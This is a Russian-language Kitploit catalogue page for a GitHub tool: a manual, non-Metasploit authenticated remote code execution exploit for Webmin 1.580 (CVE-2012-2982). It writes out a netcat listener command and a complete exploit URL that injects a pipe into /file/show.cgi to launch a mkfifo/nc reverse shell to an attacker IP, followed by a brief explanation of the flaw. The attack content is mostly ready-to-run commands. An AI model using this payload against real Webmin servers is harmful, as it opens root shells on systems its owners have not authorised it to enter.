Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit- — Ручной, не-Metasploit аутентифицированный эксплойт для удаленного выполнения кода (RCE) через URL-строку браузера для Webmin 1.580 (CVE-2012-2982) | Kitploit
Инструменты/GitHubGitHub/marinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubmarinovharisan/webmin-1.580---file-show.cgi-manual-remote-command-execution-non-metasploit-

Webmin-1.580---file-show.cgi-Manual-Remote-Command-Execution-Non-Metasploit-

Ручной, не-Metasploit аутентифицированный эксплойт для удаленного выполнения кода (RCE) через URL-строку браузера для Webmin 1.580 (CVE-2012-2982)

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Webmin 1.580: Руководство по выполнению RCE

Краткое руководство по выполнению аутентифицированного удаленного выполнения кода (RCE) на Webmin 1.580 через компонент /file/show.cgi.


1. Атакующая машина (Listener)

Выполните эту команду на своей локальной машине, чтобы перехватить входящее соединение перед выполнением полезной нагрузки:

root@kitploit:~
rlwrap nc -lnvp 4444

2. Полезная нагрузка эксплойта для цели

Вставьте следующий URL непосредственно в адресную строку вашего браузера (предварительно убедитесь, что вы вошли в панель управления Webmin):

root@kitploit:~
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Screenshot 2026-05-25 220641

Примечание: Не забудьте заменить <YOUR_ATTACK_IP> на ваш фактический локальный или туннельный IP-адрес, А ТАКЖЕ IP и ПОРТ цели.

Screenshot 2026-05-25 220708

Контекст и подробности

Уязвимость: Недостаточная обработка встроенной информации о пути, передаваемой внутренней функции open() Perl в /file/show.cgi. Добавление символа канала (|) позволяет выполнить произвольные команды с привилегиями root.

Аутентификация: Требуется активная сессия. Браузер автоматически обрабатывает аутентификацию, отправляя куки вашей активной сессии при отправке URL-полезной нагрузки.

Ожидаемое поведение: После нажатия Enter вкладка браузера закрутится и, похоже, зависнет на неопределенное время. Это подтверждает, что поток сервера был успешно захвачен для поддержания интерактивной сессии оболочки.

Скачать инструмент